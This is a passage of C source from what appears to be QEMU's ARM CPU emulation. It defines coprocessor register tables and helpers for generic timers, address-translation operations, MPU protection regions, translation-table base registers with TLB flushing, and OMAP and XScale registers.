offsetof(CPUARMState, cp15.c14_timer[GTIMER_PHYS].cval), .resetvalue = 0, .accessfn = gt_ptimer_access, .readfn = gt_phys_redir_cval_read, .raw_readfn = raw_read, .writefn = gt_phys_redir_cval_write, .raw_writefn = raw_write, }, { .name = "CNTV_CVAL", .cp = 15, .crm = 14, .opc1 = 3, .access = PL0_RW, .type = ARM_CP_64BIT | ARM_CP_IO | ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].cval), .accessfn = gt_vtimer_access, .readfn = gt_virt_redir_cval_read, .raw_readfn = raw_read, .writefn = gt_virt_redir_cval_write, .raw_writefn = raw_write, }, { .name = "CNTV_CVAL_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 3, .crn = 14, .crm = 3, .opc2 = 2, .access = PL0_RW, .type = ARM_CP_IO, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_VIRT].cval), .resetvalue = 0, .accessfn = gt_vtimer_access, .readfn = gt_virt_redir_cval_read, .raw_readfn = raw_read, .writefn = gt_virt_redir_cval_write, .raw_writefn = raw_write, }, /* Secure timer -- this is actually restricted to only EL3 * and configurably Secure-EL1 via the accessfn. */ { .name = "CNTPS_TVAL_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 7, .crn = 14, .crm = 2, .opc2 = 0, .type = ARM_CP_NO_RAW | ARM_CP_IO, .access = PL1_RW, .accessfn = gt_stimer_access, .readfn = gt_sec_tval_read, .writefn = gt_sec_tval_write, .resetfn = gt_sec_timer_reset, }, { .name = "CNTPS_CTL_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 7, .crn = 14, .crm = 2, .opc2 = 1, .type = ARM_CP_IO, .access = PL1_RW, .accessfn = gt_stimer_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_SEC].ctl), .resetvalue = 0, .writefn = gt_sec_ctl_write, .raw_writefn = raw_write, }, { .name = "CNTPS_CVAL_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 7, .crn = 14, .crm = 2, .opc2 = 2, .type = ARM_CP_IO, .access = PL1_RW, .accessfn = gt_stimer_access, .fieldoffset = offsetof(CPUARMState, cp15.c14_timer[GTIMER_SEC].cval), .writefn = gt_sec_cval_write, .raw_writefn = raw_write, }, REGINFO_SENTINEL }; static CPAccessResult e2h_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (!(arm_hcr_el2_eff(env) & HCR_E2H)) { return CP_ACCESS_TRAP; } return CP_ACCESS_OK; } static void par_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { if (arm_feature(env, ARM_FEATURE_LPAE)) { raw_write(env, ri, value); } else if (arm_feature(env, ARM_FEATURE_V7)) { raw_write(env, ri, value & 0xfffff6ff); } else { raw_write(env, ri, value & 0xfffff1ff); } } /* get_phys_addr() isn't present for user-mode-only targets */ static CPAccessResult ats_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (ri->opc2 & 4) { /* The ATS12NSO* operations must trap to EL3 if executed in * Secure EL1 (which can only happen if EL3 is AArch64). * They are simply UNDEF if executed from NS EL1. * They function normally from EL2 or EL3. */ if (arm_current_el(env) == 1) { if (arm_is_secure_below_el3(env)) { return CP_ACCESS_TRAP_UNCATEGORIZED_EL3; } return CP_ACCESS_TRAP_UNCATEGORIZED; } } return CP_ACCESS_OK; } static uint64_t do_ats_write(CPUARMState *env, uint64_t value, MMUAccessType access_type, ARMMMUIdx mmu_idx) { hwaddr phys_addr; target_ulong page_size; int prot; bool ret; uint64_t par64; bool format64 = false; MemTxAttrs attrs = { 0 }; ARMMMUFaultInfo fi = { 0 }; ARMCacheAttrs cacheattrs = { 0 }; ret = get_phys_addr(env, value, access_type, mmu_idx, &phys_addr, &attrs, &prot, &page_size, &fi, &cacheattrs); if (ret) { /* * Some kinds of translation fault must cause exceptions rather * than being reported in the PAR. */ int current_el = arm_current_el(env); int target_el; uint32_t syn, fsr, fsc; bool take_exc = false; if (fi.s1ptw && current_el == 1 && !arm_is_secure(env) && arm_mmu_idx_is_stage1_of_2(mmu_idx)) { /* * Synchronous stage 2 fault on an access made as part of the * translation table walk for AT S1E0* or AT S1E1* insn * executed from NS EL1. If this is a synchronous external abort * and SCR_EL3.EA == 1, then we take a synchronous external abort * to EL3. Otherwise the fault is taken as an exception to EL2, * and HPFAR_EL2 holds the faulting IPA. */ if (fi.type == ARMFault_SyncExternalOnWalk && (env->cp15.scr_el3 & SCR_EA)) { target_el = 3; } else { env->cp15.hpfar_el2 = extract64(fi.s2addr, 12, 47) << 4; target_el = 2; } take_exc = true; } else if (fi.type == ARMFault_SyncExternalOnWalk) { /* * Synchronous external aborts during a translation table walk * are taken as Data Abort exceptions. */ if (fi.stage2) { if (current_el == 3) { target_el = 3; } else { target_el = 2; } } else { target_el = exception_target_el(env); } take_exc = true; } if (take_exc) { /* Construct FSR and FSC using same logic as arm_deliver_fault() */ if (target_el == 2 || arm_el_is_aa64(env, target_el) || arm_s1_regime_using_lpae_format(env, mmu_idx)) { fsr = arm_fi_to_lfsc(&fi); fsc = extract32(fsr, 0, 6); } else { fsr = arm_fi_to_sfsc(&fi); fsc = 0x3f; } /* * Report exception with ESR indicating a fault due to a * translation table walk for a cache maintenance instruction. */ syn = syn_data_abort_no_iss(current_el == target_el, fi.ea, 1, fi.s1ptw, 1, fsc); env->exception.vaddress = value; env->exception.fsr = fsr; raise_exception(env, EXCP_DATA_ABORT, syn, target_el); } } if (is_a64(env)) { format64 = true; } else if (arm_feature(env, ARM_FEATURE_LPAE)) { /* * ATS1Cxx: * * TTBCR.EAE determines whether the result is returned using the * 32-bit or the 64-bit PAR format * * Instructions executed in Hyp mode always use the 64bit format * * ATS1S2NSOxx uses the 64bit format if any of the following is true: * * The Non-secure TTBCR.EAE bit is set to 1 * * The implementation includes EL2, and the value of HCR.VM is 1 * * (Note that HCR.DC makes HCR.VM behave as if it is 1.) * * ATS1Hx always uses the 64bit format. */ format64 = arm_s1_regime_using_lpae_format(env, mmu_idx); if (arm_feature(env, ARM_FEATURE_EL2)) { if (mmu_idx == ARMMMUIdx_E10_0 || mmu_idx == ARMMMUIdx_E10_1 || mmu_idx == ARMMMUIdx_E10_1_PAN) { format64 |= env->cp15.hcr_el2 & (HCR_VM | HCR_DC); } else { format64 |= arm_current_el(env) == 2; } } } if (format64) { /* Create a 64-bit PAR */ par64 = (1 << 11); /* LPAE bit always set */ if (!ret) { par64 |= phys_addr & ~0xfffULL; if (!attrs.secure) { par64 |= (1 << 9); /* NS */ } par64 |= (uint64_t)cacheattrs.attrs << 56; /* ATTR */ par64 |= cacheattrs.shareability << 7; /* SH */ } else { uint32_t fsr = arm_fi_to_lfsc(&fi); par64 |= 1; /* F */ par64 |= (fsr & 0x3f) << 1; /* FS */ if (fi.stage2) { par64 |= (1 << 9); /* S */ } if (fi.s1ptw) { par64 |= (1 << 8); /* PTW */ } } } else { /* fsr is a DFSR/IFSR value for the short descriptor * translation table format (with WnR always clear). * Convert it to a 32-bit PAR. */ if (!ret) { /* We do not set any attribute bits in the PAR */ if (page_size == (1 << 24) && arm_feature(env, ARM_FEATURE_V7)) { par64 = (phys_addr & 0xff000000) | (1 << 1); } else { par64 = phys_addr & 0xfffff000; } if (!attrs.secure) { par64 |= (1 << 9); /* NS */ } } else { uint32_t fsr = arm_fi_to_sfsc(&fi); par64 = ((fsr & (1 << 10)) >> 5) | ((fsr & (1 << 12)) >> 6) | ((fsr & 0xf) << 1) | 1; } } return par64; } static void ats_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { MMUAccessType access_type = ri->opc2 & 1 ? MMU_DATA_STORE : MMU_DATA_LOAD; uint64_t par64; ARMMMUIdx mmu_idx = 0; int el = arm_current_el(env); bool secure = arm_is_secure_below_el3(env); switch (ri->opc2 & 6) { case 0: /* stage 1 current state PL1: ATS1CPR, ATS1CPW, ATS1CPRP, ATS1CPWP */ switch (el) { case 3: mmu_idx = ARMMMUIdx_SE3; break; case 2: g_assert(!secure); /* TODO: ARMv8.4-SecEL2 */ /* fall through */ case 1: if (ri->crm == 9 && (env->uncached_cpsr & CPSR_PAN)) { mmu_idx = (secure ? ARMMMUIdx_SE10_1_PAN : ARMMMUIdx_Stage1_E1_PAN); } else { mmu_idx = secure ? ARMMMUIdx_SE10_1 : ARMMMUIdx_Stage1_E1; } break; default: g_assert_not_reached(); break; } break; case 2: /* stage 1 current state PL0: ATS1CUR, ATS1CUW */ switch (el) { case 3: mmu_idx = ARMMMUIdx_SE10_0; break; case 2: mmu_idx = ARMMMUIdx_Stage1_E0; break; case 1: mmu_idx = secure ? ARMMMUIdx_SE10_0 : ARMMMUIdx_Stage1_E0; break; default: g_assert_not_reached(); break; } break; case 4: /* stage 1+2 NonSecure PL1: ATS12NSOPR, ATS12NSOPW */ mmu_idx = ARMMMUIdx_E10_1; break; case 6: /* stage 1+2 NonSecure PL0: ATS12NSOUR, ATS12NSOUW */ mmu_idx = ARMMMUIdx_E10_0; break; default: g_assert_not_reached(); break; } par64 = do_ats_write(env, value, access_type, mmu_idx); A32_BANKED_CURRENT_REG_SET(env, par, par64); } static void ats1h_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { MMUAccessType access_type = ri->opc2 & 1 ? MMU_DATA_STORE : MMU_DATA_LOAD; uint64_t par64; par64 = do_ats_write(env, value, access_type, ARMMMUIdx_E2); A32_BANKED_CURRENT_REG_SET(env, par, par64); } static CPAccessResult at_s1e2_access(CPUARMState *env, const ARMCPRegInfo *ri, bool isread) { if (arm_current_el(env) == 3 && !(env->cp15.scr_el3 & SCR_NS)) { return CP_ACCESS_TRAP; } return CP_ACCESS_OK; } static void ats_write64(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { MMUAccessType access_type = ri->opc2 & 1 ? MMU_DATA_STORE : MMU_DATA_LOAD; ARMMMUIdx mmu_idx = 0; int secure = arm_is_secure_below_el3(env); switch (ri->opc2 & 6) { case 0: switch (ri->opc1) { case 0: /* AT S1E1R, AT S1E1W, AT S1E1RP, AT S1E1WP */ if (ri->crm == 9 && (env->pstate & PSTATE_PAN)) { mmu_idx = (secure ? ARMMMUIdx_SE10_1_PAN : ARMMMUIdx_Stage1_E1_PAN); } else { mmu_idx = secure ? ARMMMUIdx_SE10_1 : ARMMMUIdx_Stage1_E1; } break; case 4: /* AT S1E2R, AT S1E2W */ mmu_idx = ARMMMUIdx_E2; break; case 6: /* AT S1E3R, AT S1E3W */ mmu_idx = ARMMMUIdx_SE3; break; default: g_assert_not_reached(); break; } break; case 2: /* AT S1E0R, AT S1E0W */ mmu_idx = secure ? ARMMMUIdx_SE10_0 : ARMMMUIdx_Stage1_E0; break; case 4: /* AT S12E1R, AT S12E1W */ mmu_idx = secure ? ARMMMUIdx_SE10_1 : ARMMMUIdx_E10_1; break; case 6: /* AT S12E0R, AT S12E0W */ mmu_idx = secure ? ARMMMUIdx_SE10_0 : ARMMMUIdx_E10_0; break; default: g_assert_not_reached(); break; } env->cp15.par_el[1] = do_ats_write(env, value, access_type, mmu_idx); } static const ARMCPRegInfo vapa_cp_reginfo[] = { { .name = "PAR", .cp = 15, .crn = 7, .crm = 4, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .resetvalue = 0, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.par_s), offsetoflow32(CPUARMState, cp15.par_ns) }, .writefn = par_write }, /* This underdecoding is safe because the reginfo is NO_RAW. */ { .name = "ATS", .cp = 15, .crn = 7, .crm = 8, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_W, .accessfn = ats_access, .writefn = ats_write, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC }, REGINFO_SENTINEL }; /* Return basic MPU access permission bits. */ static uint32_t simple_mpu_ap_bits(uint32_t val) { uint32_t ret; uint32_t mask; int i; ret = 0; mask = 3; for (i = 0; i < 16; i += 2) { ret |= (val >> i) & mask; mask <<= 2; } return ret; } /* Pad basic MPU access permission bits to extended format. */ static uint32_t extended_mpu_ap_bits(uint32_t val) { uint32_t ret; uint32_t mask; int i; ret = 0; mask = 3; for (i = 0; i < 16; i += 2) { ret |= (val & mask) << i; mask <<= 2; } return ret; } static void pmsav5_data_ap_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.pmsav5_data_ap = extended_mpu_ap_bits(value); } static uint64_t pmsav5_data_ap_read(CPUARMState *env, const ARMCPRegInfo *ri) { return simple_mpu_ap_bits(env->cp15.pmsav5_data_ap); } static void pmsav5_insn_ap_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.pmsav5_insn_ap = extended_mpu_ap_bits(value); } static uint64_t pmsav5_insn_ap_read(CPUARMState *env, const ARMCPRegInfo *ri) { return simple_mpu_ap_bits(env->cp15.pmsav5_insn_ap); } static uint64_t pmsav7_read(CPUARMState *env, const ARMCPRegInfo *ri) { uint32_t *u32p = *(uint32_t **)raw_ptr(env, ri); if (!u32p) { return 0; } u32p += env->pmsav7.rnr[M_REG_NS]; return *u32p; } static void pmsav7_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); uint32_t *u32p = *(uint32_t **)raw_ptr(env, ri); if (!u32p) { return; } u32p += env->pmsav7.rnr[M_REG_NS]; tlb_flush(CPU(cpu)); /* Mappings may have changed - purge! */ *u32p = value; } static void pmsav7_rgnr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); uint32_t nrgs = cpu->pmsav7_dregion; if (value >= nrgs) { qemu_log_mask(LOG_GUEST_ERROR, "PMSAv7 RGNR write >= # supported regions, %" PRIu32 " > %" PRIu32 "\n", (uint32_t)value, nrgs); return; } raw_write(env, ri, value); } static const ARMCPRegInfo pmsav7_cp_reginfo[] = { /* Reset for all these registers is handled in arm_cpu_reset(), * because the PMSAv7 is also used by M-profile CPUs, which do * not register cpregs but still need the state to be reset. */ { .name = "DRBAR", .cp = 15, .crn = 6, .opc1 = 0, .crm = 1, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_NO_RAW, .fieldoffset = offsetof(CPUARMState, pmsav7.drbar), .readfn = pmsav7_read, .writefn = pmsav7_write, .resetfn = arm_cp_reset_ignore }, { .name = "DRSR", .cp = 15, .crn = 6, .opc1 = 0, .crm = 1, .opc2 = 2, .access = PL1_RW, .type = ARM_CP_NO_RAW, .fieldoffset = offsetof(CPUARMState, pmsav7.drsr), .readfn = pmsav7_read, .writefn = pmsav7_write, .resetfn = arm_cp_reset_ignore }, { .name = "DRACR", .cp = 15, .crn = 6, .opc1 = 0, .crm = 1, .opc2 = 4, .access = PL1_RW, .type = ARM_CP_NO_RAW, .fieldoffset = offsetof(CPUARMState, pmsav7.dracr), .readfn = pmsav7_read, .writefn = pmsav7_write, .resetfn = arm_cp_reset_ignore }, { .name = "RGNR", .cp = 15, .crn = 6, .opc1 = 0, .crm = 2, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, pmsav7.rnr[M_REG_NS]), .writefn = pmsav7_rgnr_write, .resetfn = arm_cp_reset_ignore }, REGINFO_SENTINEL }; static const ARMCPRegInfo pmsav5_cp_reginfo[] = { { .name = "DATA_AP", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.pmsav5_data_ap), .readfn = pmsav5_data_ap_read, .writefn = pmsav5_data_ap_write, }, { .name = "INSN_AP", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, cp15.pmsav5_insn_ap), .readfn = pmsav5_insn_ap_read, .writefn = pmsav5_insn_ap_write, }, { .name = "DATA_EXT_AP", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.pmsav5_data_ap), .resetvalue = 0, }, { .name = "INSN_EXT_AP", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 3, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.pmsav5_insn_ap), .resetvalue = 0, }, { .name = "DCACHE_CFG", .cp = 15, .crn = 2, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c2_data), .resetvalue = 0, }, { .name = "ICACHE_CFG", .cp = 15, .crn = 2, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c2_insn), .resetvalue = 0, }, /* Protection region base and size registers */ { .name = "946_PRBS0", .cp = 15, .crn = 6, .crm = 0, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[0]) }, { .name = "946_PRBS1", .cp = 15, .crn = 6, .crm = 1, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[1]) }, { .name = "946_PRBS2", .cp = 15, .crn = 6, .crm = 2, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[2]) }, { .name = "946_PRBS3", .cp = 15, .crn = 6, .crm = 3, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[3]) }, { .name = "946_PRBS4", .cp = 15, .crn = 6, .crm = 4, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[4]) }, { .name = "946_PRBS5", .cp = 15, .crn = 6, .crm = 5, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[5]) }, { .name = "946_PRBS6", .cp = 15, .crn = 6, .crm = 6, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[6]) }, { .name = "946_PRBS7", .cp = 15, .crn = 6, .crm = 7, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.c6_region[7]) }, REGINFO_SENTINEL }; static void vmsa_ttbcr_raw_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { TCR *tcr = raw_ptr(env, ri); int maskshift = extract32(value, 0, 3); if (!arm_feature(env, ARM_FEATURE_V8)) { if (arm_feature(env, ARM_FEATURE_LPAE) && (value & TTBCR_EAE)) { /* Pre ARMv8 bits [21:19], [15:14] and [6:3] are UNK/SBZP when * using Long-desciptor translation table format */ value &= ~((7 << 19) | (3 << 14) | (0xf << 3)); } else if (arm_feature(env, ARM_FEATURE_EL3)) { /* In an implementation that includes the Security Extensions * TTBCR has additional fields PD0 [4] and PD1 [5] for * Short-descriptor translation table format. */ value &= TTBCR_PD1 | TTBCR_PD0 | TTBCR_N; } else { value &= TTBCR_N; } } /* Update the masks corresponding to the TCR bank being written * Note that we always calculate mask and base_mask, but * they are only used for short-descriptor tables (ie if EAE is 0); * for long-descriptor tables the TCR fields are used differently * and the mask and base_mask values are meaningless. */ tcr->raw_tcr = value; tcr->mask = ~(((uint32_t)0xffffffffu) >> maskshift); tcr->base_mask = ~((uint32_t)0x3fffu >> maskshift); } static void vmsa_ttbcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); TCR *tcr = raw_ptr(env, ri); if (arm_feature(env, ARM_FEATURE_LPAE)) { /* With LPAE the TTBCR could result in a change of ASID * via the TTBCR.A1 bit, so do a TLB flush. */ tlb_flush(CPU(cpu)); } /* Preserve the high half of TCR_EL1, set via TTBCR2. */ value = deposit64(tcr->raw_tcr, 0, 32, value); vmsa_ttbcr_raw_write(env, ri, value); } static void vmsa_ttbcr_reset(CPUARMState *env, const ARMCPRegInfo *ri) { TCR *tcr = raw_ptr(env, ri); /* Reset both the TCR as well as the masks corresponding to the bank of * the TCR being reset. */ tcr->raw_tcr = 0; tcr->mask = 0; tcr->base_mask = 0xffffc000u; } static void vmsa_tcr_el12_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); TCR *tcr = raw_ptr(env, ri); /* For AArch64 the A1 bit could result in a change of ASID, so TLB flush. */ tlb_flush(CPU(cpu)); tcr->raw_tcr = value; } static void vmsa_ttbr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* If the ASID changes (with a 64-bit write), we must flush the TLB. */ if (cpreg_field_is_64bit(ri) && extract64(raw_read(env, ri) ^ value, 48, 16) != 0) { ARMCPU *cpu = env_archcpu(env); tlb_flush(CPU(cpu)); } raw_write(env, ri, value); } static void vmsa_tcr_ttbr_el2_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* * If we are running with E2&0 regime, then an ASID is active. * Flush if that might be changing. Note we're not checking * TCR_EL2.A1 to know if this is really the TTBRx_EL2 that * holds the active ASID, only checking the field that might. */ if (extract64(raw_read(env, ri) ^ value, 48, 16) && (arm_hcr_el2_eff(env) & HCR_E2H)) { tlb_flush_by_mmuidx(env_cpu(env), ARMMMUIdxBit_E20_2 | ARMMMUIdxBit_E20_2_PAN | ARMMMUIdxBit_E20_0); } raw_write(env, ri, value); } static void vttbr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { ARMCPU *cpu = env_archcpu(env); CPUState *cs = CPU(cpu); /* * A change in VMID to the stage2 page table (Stage2) invalidates * the combined stage 1&2 tlbs (EL10_1 and EL10_0). */ if (raw_read(env, ri) != value) { tlb_flush_by_mmuidx(cs, ARMMMUIdxBit_E10_1 | ARMMMUIdxBit_E10_1_PAN | ARMMMUIdxBit_E10_0 | ARMMMUIdxBit_Stage2); raw_write(env, ri, value); } } static const ARMCPRegInfo vmsa_pmsa_cp_reginfo[] = { { .name = "DFSR", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_ALIAS, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.dfsr_s), offsetoflow32(CPUARMState, cp15.dfsr_ns) }, }, { .name = "IFSR", .cp = 15, .crn = 5, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .resetvalue = 0, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.ifsr_s), offsetoflow32(CPUARMState, cp15.ifsr_ns) } }, { .name = "DFAR", .cp = 15, .opc1 = 0, .crn = 6, .crm = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .resetvalue = 0, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.dfar_s), offsetof(CPUARMState, cp15.dfar_ns) } }, { .name = "FAR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .crn = 6, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .fieldoffset = offsetof(CPUARMState, cp15.far_el[1]), .resetvalue = 0, }, REGINFO_SENTINEL }; static const ARMCPRegInfo vmsa_cp_reginfo[] = { { .name = "ESR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .crn = 5, .crm = 2, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .fieldoffset = offsetof(CPUARMState, cp15.esr_el[1]), .resetvalue = 0, }, { .name = "TTBR0_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .writefn = vmsa_ttbr_write, .resetvalue = 0, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.ttbr0_s), offsetof(CPUARMState, cp15.ttbr0_ns) } }, { .name = "TTBR1_EL1", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 0, .crn = 2, .crm = 0, .opc2 = 1, .access = PL1_RW, .accessfn = access_tvm_trvm, .writefn = vmsa_ttbr_write, .resetvalue = 0, .bank_fieldoffsets = { offsetof(CPUARMState, cp15.ttbr1_s), offsetof(CPUARMState, cp15.ttbr1_ns) } }, { .name = "TCR_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .crn = 2, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .accessfn = access_tvm_trvm, .writefn = vmsa_tcr_el12_write, .resetfn = vmsa_ttbcr_reset, .raw_writefn = raw_write, .fieldoffset = offsetof(CPUARMState, cp15.tcr_el[1]) }, { .name = "TTBCR", .cp = 15, .crn = 2, .crm = 0, .opc1 = 0, .opc2 = 2, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_ALIAS, .writefn = vmsa_ttbcr_write, .raw_writefn = vmsa_ttbcr_raw_write, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.tcr_el[3]), offsetoflow32(CPUARMState, cp15.tcr_el[1])} }, REGINFO_SENTINEL }; /* Note that unlike TTBCR, writing to TTBCR2 does not require flushing * qemu tlbs nor adjusting cached masks. */ static const ARMCPRegInfo ttbcr2_reginfo = { .name = "TTBCR2", .cp = 15, .opc1 = 0, .crn = 2, .crm = 0, .opc2 = 3, .access = PL1_RW, .accessfn = access_tvm_trvm, .type = ARM_CP_ALIAS, .bank_fieldoffsets = { offsetofhigh32(CPUARMState, cp15.tcr_el[3]), offsetofhigh32(CPUARMState, cp15.tcr_el[1]) }, }; static void omap_ticonfig_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.c15_ticonfig = value & 0xe7; /* The OS_TYPE bit in this register changes the reported CPUID! */ env->cp15.c0_cpuid = (value & (1 << 5)) ? ARM_CPUID_TI915T : ARM_CPUID_TI925T; } static void omap_threadid_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.c15_threadid = value & 0xffff; } static void omap_wfi_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Wait-for-interrupt (deprecated) */ cpu_interrupt(env_cpu(env), CPU_INTERRUPT_HALT); } static void omap_cachemaint_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* On OMAP there are registers indicating the max/min index of dcache lines * containing a dirty line; cache flush operations have to reset these. */ env->cp15.c15_i_max = 0x000; env->cp15.c15_i_min = 0xff0; } static const ARMCPRegInfo omap_cp_reginfo[] = { { .name = "DFSR", .cp = 15, .crn = 5, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_OVERRIDE, .fieldoffset = offsetoflow32(CPUARMState, cp15.esr_el[1]), .resetvalue = 0, }, { .name = "", .cp = 15, .crn = 15, .crm = 0, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_NOP }, { .name = "TICONFIG", .cp = 15, .crn = 15, .crm = 1, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c15_ticonfig), .resetvalue = 0, .writefn = omap_ticonfig_write }, { .name = "IMAX", .cp = 15, .crn = 15, .crm = 2, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c15_i_max), .resetvalue = 0, }, { .name = "IMIN", .cp = 15, .crn = 15, .crm = 3, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .resetvalue = 0xff0, .fieldoffset = offsetof(CPUARMState, cp15.c15_i_min) }, { .name = "THREADID", .cp = 15, .crn = 15, .crm = 4, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c15_threadid), .resetvalue = 0, .writefn = omap_threadid_write }, { .name = "TI925T_STATUS", .cp = 15, .crn = 15, .crm = 8, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .type = ARM_CP_NO_RAW, .readfn = arm_cp_read_zero, .writefn = omap_wfi_write, }, /* TODO: Peripheral port remap register: * On OMAP2 mcr p15, 0, rn, c15, c2, 4 sets up the interrupt controller * base address at $rn & ~0xfff and map size of 0x200 << ($rn & 0xfff), * when MMU is off. */ { .name = "OMAP_CACHEMAINT", .cp = 15, .crn = 7, .crm = CP_ANY, .opc1 = 0, .opc2 = CP_ANY, .access = PL1_W, .type = ARM_CP_OVERRIDE | ARM_CP_NO_RAW, .writefn = omap_cachemaint_write }, { .name = "C9", .cp = 15, .crn = 9, .crm = CP_ANY, .opc1 = CP_ANY, .opc2 = CP_ANY, .access = PL1_RW, .type = ARM_CP_CONST | ARM_CP_OVERRIDE, .resetvalue = 0 }, REGINFO_SENTINEL }; static void xscale_cpar_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { env->cp15.c15_cpar = value & 0x3fff; } static const ARMCPRegInfo xscale_cp_reginfo[] = { { .name = "XSCALE_CPAR", .cp = 15, .crn = 15, .crm = 1, .opc1 = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c15_cpar), .resetvalue = 0, .writefn = xscale_cpar_write, }, { .name = "XSCALE_AUXCR", .cp = 15, .crn = 1, .crm = 0, .opc1 = 0, .opc2 = 1, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, cp15.c1_xscaleauxcr), .resetvalue = 0, }, /* XScale specific cache-lockdown: since we have no cache we 